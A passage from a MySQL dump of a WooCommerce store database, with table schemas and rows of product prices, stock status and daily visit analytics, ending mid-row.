CREATE TABLE `wp_wc_product_attributes_lookup` (
  `product_id` bigint(20) NOT NULL,
  `product_or_parent_id` bigint(20) NOT NULL,
  `taxonomy` varchar(32) NOT NULL,
  `term_id` bigint(20) NOT NULL,
  `is_variation_attribute` tinyint(1) NOT NULL,
  `in_stock` tinyint(1) NOT NULL,
  PRIMARY KEY (`product_or_parent_id`,`term_id`,`product_id`,`taxonomy`),
  KEY `is_variation_attribute_term_id` (`is_variation_attribute`,`term_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_product_attributes_lookup`
--

LOCK TABLES `wp_wc_product_attributes_lookup` WRITE;
/*!40000 ALTER TABLE `wp_wc_product_attributes_lookup` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wc_product_attributes_lookup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_product_download_directories`
--

DROP TABLE IF EXISTS `wp_wc_product_download_directories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_product_download_directories` (
  `url_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `url` varchar(256) NOT NULL,
  `enabled` tinyint(1) NOT NULL DEFAULT 0,
  PRIMARY KEY (`url_id`),
  KEY `url` (`url`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_product_download_directories`
--

LOCK TABLES `wp_wc_product_download_directories` WRITE;
/*!40000 ALTER TABLE `wp_wc_product_download_directories` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wc_product_download_directories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_product_meta_lookup`
--

DROP TABLE IF EXISTS `wp_wc_product_meta_lookup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_product_meta_lookup` (
  `product_id` bigint(20) NOT NULL,
  `sku` varchar(100) DEFAULT '',
  `virtual` tinyint(1) DEFAULT 0,
  `downloadable` tinyint(1) DEFAULT 0,
  `min_price` decimal(19,4) DEFAULT NULL,
  `max_price` decimal(19,4) DEFAULT NULL,
  `onsale` tinyint(1) DEFAULT 0,
  `stock_quantity` double DEFAULT NULL,
  `stock_status` varchar(100) DEFAULT 'instock',
  `rating_count` bigint(20) DEFAULT 0,
  `average_rating` decimal(3,2) DEFAULT 0.00,
  `total_sales` bigint(20) DEFAULT 0,
  `tax_status` varchar(100) DEFAULT 'taxable',
  `tax_class` varchar(100) DEFAULT '',
  `global_unique_id` varchar(100) DEFAULT '',
  PRIMARY KEY (`product_id`),
  KEY `virtual` (`virtual`),
  KEY `downloadable` (`downloadable`),
  KEY `stock_status` (`stock_status`),
  KEY `stock_quantity` (`stock_quantity`),
  KEY `onsale` (`onsale`),
  KEY `min_max_price` (`min_price`,`max_price`),
  KEY `sku` (`sku`(50))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_product_meta_lookup`
--

LOCK TABLES `wp_wc_product_meta_lookup` WRITE;
/*!40000 ALTER TABLE `wp_wc_product_meta_lookup` DISABLE KEYS */;
INSERT INTO `wp_wc_product_meta_lookup` VALUES (529,'',0,0,100.0000,100.0000,0,NULL,'instock',0,0.00,0,'taxable','',''),(530,'',0,0,110.0000,110.0000,0,NULL,'instock',0,0.00,1,'taxable','',''),(531,'',0,0,0.0000,0.0000,0,NULL,'instock',0,0.00,0,'taxable','',''),(532,'',0,0,140.0000,140.0000,0,NULL,'instock',0,0.00,3,'taxable','',''),(533,'',0,0,150.0000,150.0000,0,NULL,'instock',0,0.00,0,'taxable','',''),(534,'',0,0,160.0000,160.0000,0,NULL,'instock',0,0.00,1,'taxable','',''),(535,'',0,0,170.0000,170.0000,0,NULL,'instock',0,0.00,0,'taxable','',''),(536,'',0,0,180.0000,180.0000,0,NULL,'instock',0,0.00,1,'taxable','',''),(537,'',0,0,110.0000,110.0000,0,NULL,'instock',0,0.00,1,'taxable','',''),(538,'',0,0,190.0000,190.0000,0,NULL,'instock',0,0.00,0,'taxable','',''),(539,'',0,0,200.0000,200.0000,0,NULL,'instock',0,0.00,1,'taxable','',''),(540,'',0,0,200.0000,200.0000,0,NULL,'instock',0,0.00,0,'taxable','',''),(541,'',0,0,210.0000,210.0000,0,NULL,'instock',0,0.00,0,'taxable','',''),(542,'',0,0,220.0000,220.0000,0,NULL,'instock',0,0.00,1,'taxable','',''),(543,'',0,0,220.0000,220.0000,0,NULL,'instock',0,0.00,2,'taxable','',''),(576,'',0,0,180.0000,180.0000,0,NULL,'instock',0,0.00,0,'taxable','',''),(578,'',0,0,190.0000,190.0000,0,NULL,'instock',0,0.00,0,'taxable','',''),(590,'',0,0,80.0000,80.0000,0,NULL,'instock',0,0.00,1,'taxable','',''),(596,'',0,0,60.0000,60.0000,1,NULL,'instock',0,0.00,2,'taxable','',''),(612,'',0,0,74.0000,74.0000,1,NULL,'instock',0,0.00,0,'taxable','',''),(637,'',0,0,68.0000,68.0000,0,NULL,'instock',0,0.00,0,'taxable','',''),(640,'',0,0,120.0000,120.0000,1,NULL,'instock',0,0.00,0,'taxable','',''),(991,'',0,0,200.0000,200.0000,1,10,'instock',0,0.00,0,'taxable','',''),(1000,'',0,0,400.0000,400.0000,0,NULL,'instock',0,0.00,4,'taxable','',''),(1001,'',0,0,500.0000,500.0000,0,NULL,'instock',0,0.00,1,'taxable','',''),(1004,'',0,0,222.0000,222.0000,0,NULL,'instock',0,0.00,5,'taxable','',''),(1006,'',0,0,999.0000,999.0000,0,NULL,'instock',0,0.00,0,'taxable','',''),(1020,'',0,0,123.0000,123.0000,0,NULL,'instock',0,0.00,2,'taxable','',''),(1021,'',0,0,222.0000,222.0000,0,NULL,'instock',0,0.00,0,'taxable','',''),(1039,'',0,0,200.0000,200.0000,0,NULL,'instock',0,0.00,0,'taxable','',''),(1041,'',0,0,140.0000,140.0000,0,NULL,'instock',0,0.00,0,'taxable','',''),(1069,'',0,0,499.0000,499.0000,0,NULL,'outofstock',0,0.00,1,'taxable','',''),(1082,'',0,0,499.0000,499.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1083,'',0,0,599.0000,599.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1084,'',0,0,1499.0000,1499.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1085,'',0,0,2199.0000,2199.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1086,'',0,0,999.0000,999.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1087,'',0,0,1299.0000,1299.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1088,'',0,0,799.0000,799.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1089,'',0,0,1099.0000,1099.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1091,'',0,0,499.0000,499.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1092,'',0,0,499.0000,499.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1093,'',0,0,499.0000,499.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1094,'',0,0,0.0000,0.0000,0,NULL,'instock',0,0.00,0,'taxable','',''),(1095,'',0,0,499.0000,499.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1097,'',0,0,499.0000,499.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1098,'',0,0,100.0000,100.0000,0,NULL,'instock',0,0.00,0,'taxable','',''),(1100,'',0,0,499.0000,499.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1102,'',0,0,80.0000,80.0000,1,NULL,'outofstock',0,0.00,0,'taxable','',''),(1107,'',0,0,38.0000,38.0000,1,NULL,'outofstock',0,0.00,1,'taxable','',''),(1109,'',0,0,95.0000,95.0000,1,NULL,'outofstock',0,0.00,0,'taxable','',''),(1111,'',0,0,112.0000,112.0000,1,NULL,'outofstock',0,0.00,0,'taxable','',''),(1114,'',0,0,349.0000,349.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1116,'',0,0,499.0000,499.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1117,'',0,0,65.0000,65.0000,1,NULL,'outofstock',0,0.00,0,'taxable','',''),(1119,'',0,0,249.0000,249.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1120,'',0,0,379.0000,379.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1122,'',0,0,299.0000,299.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1123,'',0,0,449.0000,449.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1125,'',0,0,699.0000,699.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1126,'',0,0,999.0000,999.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1128,'',0,0,399.0000,399.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1129,'',0,0,599.0000,599.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1131,'',0,0,799.0000,799.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1132,'',0,0,1099.0000,1099.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1134,'',0,0,899.0000,899.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1135,'',0,0,1299.0000,1299.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1137,'',0,0,799.0000,799.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1138,'',0,0,1099.0000,1099.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1140,'',0,0,899.0000,899.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1141,'',0,0,1299.0000,1299.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1143,'',0,0,799.0000,799.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1144,'',0,0,1099.0000,1099.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1145,'',0,0,2000.0000,2000.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1146,'',0,0,4000.0000,4000.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1157,'',0,0,95.0000,95.0000,0,NULL,'instock',0,0.00,0,'taxable','',''),(1159,'',0,0,95.0000,95.0000,0,NULL,'outofstock',0,0.00,4,'taxable','',''),(1161,'',0,0,95.0000,95.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1163,'',0,0,95.0000,95.0000,0,NULL,'outofstock',0,0.00,2,'taxable','',''),(1165,'',0,0,95.0000,95.0000,0,NULL,'outofstock',0,0.00,2,'taxable','',''),(1167,'',0,0,260.0000,260.0000,1,NULL,'outofstock',0,0.00,0,'taxable','',''),(1169,'',0,0,260.0000,260.0000,1,NULL,'outofstock',0,0.00,0,'taxable','',''),(1170,'',0,0,95.0000,95.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1194,'',0,0,999.0000,999.0000,0,NULL,'outofstock',0,0.00,8,'taxable','',''),(1263,'',0,0,299.0000,299.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1264,'',0,0,799.0000,799.0000,0,NULL,'outofstock',0,0.00,0,'taxable','',''),(1276,'',0,0,598.0000,598.0000,0,NULL,'instock',0,0.00,2,'taxable','',''),(1287,'',0,0,1299.0000,1299.0000,0,NULL,'instock',0,0.00,0,'taxable','',''),(1288,'',0,0,3499.0000,3499.0000,0,NULL,'instock',0,0.00,0,'taxable','',''),(1289,'',0,0,6499.0000,6499.0000,0,NULL,'instock',0,0.00,0,'taxable','',''),(1755,'',0,0,32000.0000,32000.0000,0,NULL,'instock',0,0.00,0,'taxable','',''),(1775,'',0,0,21000.0000,21000.0000,0,NULL,'instock',0,0.00,3,'taxable','',''),(1786,'',0,0,21000.0000,21000.0000,0,NULL,'instock',0,0.00,1,'taxable','','');
/*!40000 ALTER TABLE `wp_wc_product_meta_lookup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_rate_limits`
--

DROP TABLE IF EXISTS `wp_wc_rate_limits`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_rate_limits` (
  `rate_limit_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `rate_limit_key` varchar(200) NOT NULL,
  `rate_limit_expiry` bigint(20) unsigned NOT NULL,
  `rate_limit_remaining` smallint(10) NOT NULL DEFAULT 0,
  PRIMARY KEY (`rate_limit_id`),
  UNIQUE KEY `rate_limit_key` (`rate_limit_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_rate_limits`
--

LOCK TABLES `wp_wc_rate_limits` WRITE;
/*!40000 ALTER TABLE `wp_wc_rate_limits` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wc_rate_limits` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_reserved_stock`
--

DROP TABLE IF EXISTS `wp_wc_reserved_stock`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_reserved_stock` (
  `order_id` bigint(20) NOT NULL,
  `product_id` bigint(20) NOT NULL,
  `stock_quantity` double NOT NULL DEFAULT 0,
  `timestamp` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `expires` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  PRIMARY KEY (`order_id`,`product_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_reserved_stock`
--

LOCK TABLES `wp_wc_reserved_stock` WRITE;
/*!40000 ALTER TABLE `wp_wc_reserved_stock` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wc_reserved_stock` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_tax_rate_classes`
--

DROP TABLE IF EXISTS `wp_wc_tax_rate_classes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_tax_rate_classes` (
  `tax_rate_class_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) NOT NULL DEFAULT '',
  `slug` varchar(200) NOT NULL DEFAULT '',
  PRIMARY KEY (`tax_rate_class_id`),
  UNIQUE KEY `slug` (`slug`(191))
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_tax_rate_classes`
--

LOCK TABLES `wp_wc_tax_rate_classes` WRITE;
/*!40000 ALTER TABLE `wp_wc_tax_rate_classes` DISABLE KEYS */;
INSERT INTO `wp_wc_tax_rate_classes` VALUES (1,'Reduced rate','reduced-rate'),(2,'Zero rate','zero-rate');
/*!40000 ALTER TABLE `wp_wc_tax_rate_classes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_webhooks`
--

DROP TABLE IF EXISTS `wp_wc_webhooks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wc_webhooks` (
  `webhook_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `status` varchar(200) NOT NULL,
  `name` text NOT NULL,
  `user_id` bigint(20) unsigned NOT NULL,
  `delivery_url` text NOT NULL,
  `secret` text NOT NULL,
  `topic` varchar(200) NOT NULL,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_created_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `api_version` smallint(4) NOT NULL,
  `failure_count` smallint(10) NOT NULL DEFAULT 0,
  `pending_delivery` tinyint(1) NOT NULL DEFAULT 0,
  PRIMARY KEY (`webhook_id`),
  KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_webhooks`
--

LOCK TABLES `wp_wc_webhooks` WRITE;
/*!40000 ALTER TABLE `wp_wc_webhooks` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wc_webhooks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_daily_analysis`
--

DROP TABLE IF EXISTS `wp_wcfm_daily_analysis`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_daily_analysis` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `is_shop` tinyint(1) NOT NULL DEFAULT 0,
  `is_store` tinyint(1) NOT NULL DEFAULT 0,
  `is_product` tinyint(1) NOT NULL DEFAULT 0,
  `product_id` bigint(20) NOT NULL DEFAULT 0,
  `author_id` bigint(20) NOT NULL DEFAULT 0,
  `count` bigint(20) NOT NULL DEFAULT 0,
  `visited` date NOT NULL DEFAULT '0000-00-00',
  PRIMARY KEY (`ID`),
  UNIQUE KEY `daily_analysis` (`product_id`,`author_id`,`visited`)
) ENGINE=InnoDB AUTO_INCREMENT=3745 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_daily_analysis`
--

LOCK TABLES `wp_wcfm_daily_analysis` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_daily_analysis` DISABLE KEYS */;
INSERT INTO `wp_wcfm_daily_analysis` VALUES (1,9,0,0,43,1,2,'2022-01-28'),(2,1,0,0,0,2,6,'2022-01-28'),(9,9,0,0,44,1,5,'2022-01-28'),(14,9,0,0,43,1,3,'2022-01-31'),(15,9,0,0,45,1,2,'2022-01-31'),(16,1,0,0,0,2,7,'2022-01-31'),(17,9,0,0,36,1,1,'2022-01-31'),(21,0,0,1,596,2,1,'2022-01-31'),(23,0,0,1,590,2,1,'2022-01-31'),(29,9,0,0,35,1,1,'2022-01-31'),(30,9,0,0,38,1,1,'2022-01-31'),(31,1,0,0,0,2,3,'2022-02-01'),(33,9,0,0,35,1,1,'2022-02-01'),(34,9,0,0,38,1,1,'2022-02-01'),(35,9,0,0,36,1,1,'2022-02-01'),(36,9,0,0,77,1,1,'2022-02-01'),(37,9,0,0,76,1,1,'2022-02-01'),(38,9,0,0,78,1,1,'2022-02-01'),(40,9,0,0,37,1,1,'2022-02-01'),(41,1,0,0,0,2,7,'2022-02-02'),(43,9,0,0,78,1,2,'2022-02-02'),(44,9,0,0,35,1,1,'2022-02-02'),(45,9,0,0,36,1,1,'2022-02-02'),(46,9,0,0,37,1,1,'2022-02-02'),(47,9,0,0,76,1,2,'2022-02-02'),(48,9,0,0,38,1,1,'2022-02-02'),(49,9,0,0,77,1,1,'2022-02-02'),(51,9,0,0,79,1,1,'2022-02-02'),(52,9,0,0,80,1,1,'2022-02-02'),(55,0,0,1,541,2,2,'2022-02-02'),(61,1,0,0,0,2,2,'2022-02-03'),(63,0,0,1,596,2,1,'2022-02-03'),(64,9,0,0,38,1,1,'2022-02-03'),(65,0,0,1,637,5,1,'2022-02-03'),(66,1,0,0,0,2,3,'2022-02-04'),(67,0,0,1,596,2,4,'2022-02-04'),(68,0,0,1,637,5,3,'2022-02-04'),(69,0,0,1,612,3,1,'2022-02-04'),(71,0,0,1,538,2,1,'2022-02-04'),(72,0,0,1,536,3,1,'2022-02-04'),(78,0,0,1,540,4,1,'2022-02-04'),(79,9,0,0,36,1,1,'2022-02-04'),(80,9,0,0,38,1,1,'2022-02-04'),(82,0,0,1,535,2,1,'2022-02-05'),(83,9,0,0,35,1,1,'2022-02-05'),(84,9,0,0,36,1,1,'2022-02-05'),(85,9,0,0,37,1,1,'2022-02-05'),(86,9,0,0,76,1,1,'2022-02-05'),(87,9,0,0,38,1,1,'2022-02-05'),(88,9,0,0,77,1,1,'2022-02-05'),(89,9,0,0,78,1,1,'2022-02-05'),(90,9,0,0,79,1,1,'2022-02-05'),(91,9,0,0,80,1,1,'2022-02-05'),(92,1,0,0,0,2,3,'2022-02-07'),(93,0,0,1,596,2,1,'2022-02-07'),(94,9,0,0,83,1,1,'2022-02-07'),(96,9,0,0,85,1,2,'2022-02-07'),(97,0,1,0,0,5,1,'2022-02-07'),(100,9,0,0,35,1,1,'2022-02-07'),(101,9,0,0,37,1,1,'2022-02-07'),(102,9,0,0,76,1,1,'2022-02-07'),(103,9,0,0,38,1,1,'2022-02-07'),(104,9,0,0,85,1,2,'2022-02-08'),(105,0,0,1,596,2,2,'2022-02-08'),(108,1,0,0,0,2,1,'2022-02-08'),(109,0,0,1,612,3,1,'2022-02-08'),(110,0,0,1,637,5,1,'2022-02-08'),(111,9,0,0,79,1,1,'2022-02-09'),(112,9,0,0,80,1,4,'2022-02-09'),(113,9,0,0,77,1,2,'2022-02-09'),(114,9,0,0,38,1,1,'2022-02-09'),(115,9,0,0,76,1,2,'2022-02-09'),(116,9,0,0,37,1,1,'2022-02-09'),(120,9,0,0,78,1,1,'2022-02-09'),(123,1,0,0,0,2,1,'2022-02-09'),(124,9,0,0,79,1,1,'2022-02-10'),(125,9,0,0,80,1,1,'2022-02-10'),(126,0,0,1,543,4,1,'2022-02-10'),(127,0,0,1,542,3,1,'2022-02-10'),(128,0,0,1,596,2,1,'2022-02-10'),(129,1,0,0,0,5,1,'2022-02-10'),(130,1,0,0,0,2,2,'2022-02-11'),(131,9,0,0,76,1,1,'2022-02-11'),(132,9,0,0,80,1,1,'2022-02-11'),(134,9,0,0,77,1,1,'2022-02-11'),(135,1,0,0,0,2,2,'2022-02-12'),(136,9,0,0,35,1,2,'2022-02-12'),(137,9,0,0,36,1,2,'2022-02-12'),(138,9,0,0,37,1,2,'2022-02-12'),(139,9,0,0,76,1,2,'2022-02-12'),(140,9,0,0,38,1,2,'2022-02-12'),(143,0,0,1,531,4,1,'2022-02-12'),(144,0,0,1,529,2,1,'2022-02-12'),(146,0,0,1,637,5,1,'2022-02-12'),(148,9,0,0,80,1,1,'2022-02-12'),(149,9,0,0,79,1,1,'2022-02-12'),(150,0,0,1,543,4,1,'2022-02-12'),(151,0,0,1,534,4,1,'2022-02-12'),(152,0,0,1,535,2,1,'2022-02-12'),(153,0,0,1,590,2,1,'2022-02-12'),(154,0,0,1,612,3,1,'2022-02-12'),(155,9,0,0,77,1,1,'2022-02-12'),(156,0,0,1,539,3,1,'2022-02-12'),(157,9,0,0,44,1,1,'2022-02-12'),(158,0,0,1,536,3,1,'2022-02-12'),(159,9,0,0,45,1,1,'2022-02-12'),(160,0,0,1,532,2,1,'2022-02-12'),(161,0,0,1,533,3,1,'2022-02-12'),(162,9,0,0,78,1,1,'2022-02-12'),(163,0,0,1,540,4,1,'2022-02-12'),(164,9,0,0,85,1,1,'2022-02-12'),(165,0,0,1,537,4,1,'2022-02-12'),(166,0,0,1,542,3,1,'2022-02-12'),(167,0,0,1,538,2,1,'2022-02-12'),(170,0,0,1,596,2,1,'2022-02-12'),(171,0,0,1,541,2,1,'2022-02-12'),(172,0,0,1,530,1,1,'2022-02-12'),(173,9,0,0,43,1,1,'2022-02-12'),(174,9,0,0,77,1,2,'2022-02-13'),(175,9,0,0,76,1,2,'2022-02-13'),(176,1,0,0,0,2,1,'2022-02-13'),(177,0,0,1,637,5,2,'2022-02-13'),(178,9,0,0,80,1,1,'2022-02-13'),(179,9,0,0,38,1,1,'2022-02-13'),(182,9,0,0,35,1,1,'2022-02-13'),(183,9,0,0,36,1,1,'2022-02-13'),(184,0,0,1,536,3,1,'2022-02-13'),(185,0,0,1,535,2,1,'2022-02-13'),(186,9,0,0,78,1,1,'2022-02-13'),(187,0,0,1,590,2,1,'2022-02-13'),(189,0,0,1,541,2,1,'2022-02-13'),(190,0,0,1,532,2,1,'2022-02-13'),(191,0,0,1,543,4,1,'2022-02-13'),(192,1,0,0,0,2,2,'2022-02-14'),(193,0,0,1,542,3,3,'2022-02-14'),(194,0,0,1,530,1,1,'2022-02-14'),(195,9,0,0,45,1,1,'2022-02-14'),(196,9,0,0,43,1,1,'2022-02-14'),(197,9,0,0,85,1,1,'2022-02-14'),(198,0,0,1,537,4,1,'2022-02-14'),(200,0,0,1,596,2,1,'2022-02-14'),(201,0,0,1,637,5,1,'2022-02-14'),(202,0,0,1,543,4,2,'2022-02-14'),(206,0,0,1,531,4,1,'2022-02-15'),(207,9,0,0,80,1,1,'2022-02-15'),(208,9,0,0,127,1,1,'2022-02-16'),(209,0,0,1,540,4,1,'2022-02-16'),(210,1,0,0,0,2,2,'2022-02-16'),(212,9,0,0,35,1,1,'2022-02-16'),(213,1,0,0,0,2,4,'2022-02-17'),(216,9,0,0,78,1,1,'2022-02-17'),(217,0,0,1,537,4,1,'2022-02-17'),(218,0,0,1,536,3,1,'2022-02-17'),(219,0,0,1,538,2,1,'2022-02-17'),(220,0,0,1,535,2,1,'2022-02-17'),(221,9,0,0,127,1,1,'2022-02-17'),(222,9,0,0,85,1,1,'2022-02-17'),(223,9,0,0,35,1,1,'2022-02-17'),(224,0,0,1,532,2,1,'2022-02-17'),(226,0,0,1,596,2,1,'2022-02-17'),(227,0,0,1,637,5,1,'2022-02-17'),(228,9,0,0,80,1,1,'2022-02-19'),(229,9,0,0,35,1,1,'2022-02-19'),(230,9,0,0,36,1,1,'2022-02-20'),(231,0,0,1,542,3,1,'2022-02-20'),(232,0,0,1,539,3,1,'2022-02-20'),(233,9,0,0,85,1,1,'2022-02-20'),(234,0,0,1,530,1,2,'2022-02-20'),(235,0,0,1,538,2,1,'2022-02-20'),(236,9,0,0,38,1,1,'2022-02-20'),(237,0,0,1,540,4,1,'2022-02-20'),(238,9,0,0,37,1,1,'2022-02-20'),(239,0,0,1,543,4,1,'2022-02-20'),(240,9,0,0,78,1,1,'2022-02-20'),(241,0,0,1,590,2,1,'2022-02-20'),(242,9,0,0,77,1,1,'2022-02-20'),(243,0,0,1,596,2,1,'2022-02-20'),(244,9,0,0,76,1,1,'2022-02-20'),(245,0,0,1,533,3,1,'2022-02-20'),(246,0,0,1,532,2,1,'2022-02-20'),(247,9,0,0,79,1,1,'2022-02-20'),(248,0,0,1,536,3,1,'2022-02-20'),(249,0,0,1,541,2,1,'2022-02-20'),(250,0,0,1,537,4,2,'2022-02-20'),(251,0,0,1,637,5,1,'2022-02-20'),(252,0,0,1,531,4,1,'2022-02-20'),(253,0,0,1,534,4,1,'2022-02-20'),(254,0,0,1,535,2,1,'2022-02-20'),(255,1,0,0,0,2,8,'2022-02-20'),(265,0,0,1,531,4,1,'2022-02-21'),(266,0,0,1,534,4,1,'2022-02-21'),(267,9,0,0,85,1,1,'2022-02-21'),(268,1,0,0,0,2,1,'2022-02-22'),(269,9,0,0,35,1,1,'2022-02-22'),(270,9,0,0,36,1,2,'2022-02-22'),(271,9,0,0,37,1,2,'2022-02-22'),(272,9,0,0,76,1,1,'2022-02-22'),(273,9,0,0,38,1,1,'2022-02-22'),(274,9,0,0,77,1,1,'2022-02-22'),(275,9,0,0,78,1,1,'2022-02-22'),(276,9,0,0,79,1,2,'2022-02-22'),(277,9,0,0,80,1,1,'2022-02-22'),(278,0,0,1,542,3,1,'2022-02-22'),(279,0,0,1,541,2,2,'2022-02-22'),(280,0,0,1,540,4,1,'2022-02-22'),(281,0,0,1,539,3,1,'2022-02-22'),(282,0,0,1,538,2,1,'2022-02-22'),(283,0,0,1,537,4,1,'2022-02-22'),(284,0,0,1,536,3,1,'2022-02-22'),(285,0,0,1,535,2,2,'2022-02-22'),(286,0,0,1,534,4,1,'2022-02-22'),(287,0,0,1,533,3,1,'2022-02-22'),(288,0,0,1,532,2,1,'2022-02-22'),(289,0,0,1,531,4,1,'2022-02-22'),(290,0,0,1,530,1,1,'2022-02-22'),(291,0,0,1,529,2,2,'2022-02-22'),(292,0,0,1,637,5,1,'2022-02-22'),(293,0,0,1,596,2,1,'2022-02-22'),(294,0,0,1,612,3,1,'2022-02-22'),(295,0,0,1,590,2,1,'2022-02-22'),(296,0,0,1,543,4,1,'2022-02-22'),(297,9,0,0,127,1,2,'2022-02-22'),(298,9,0,0,128,1,2,'2022-02-22'),(299,9,0,0,129,1,2,'2022-02-22'),(309,9,0,0,35,1,1,'2022-02-23'),(310,0,0,1,1000,20,1,'2022-02-23'),(311,0,0,1,1001,20,1,'2022-02-23'),(312,1,0,0,0,2,4,'2022-02-24'),(314,9,0,0,85,1,1,'2022-02-24'),(315,9,0,0,77,1,1,'2022-02-24'),(316,9,0,0,35,1,2,'2022-02-24'),(317,0,0,1,596,2,1,'2022-02-24'),(318,9,0,0,127,1,1,'2022-02-24'),(319,9,0,0,128,1,1,'2022-02-24'),(321,0,0,1,1004,22,1,'2022-02-24'),(322,9,0,0,76,1,1,'2022-02-24'),(323,0,0,1,537,4,1,'2022-02-24'),(325,0,0,1,590,2,1,'2022-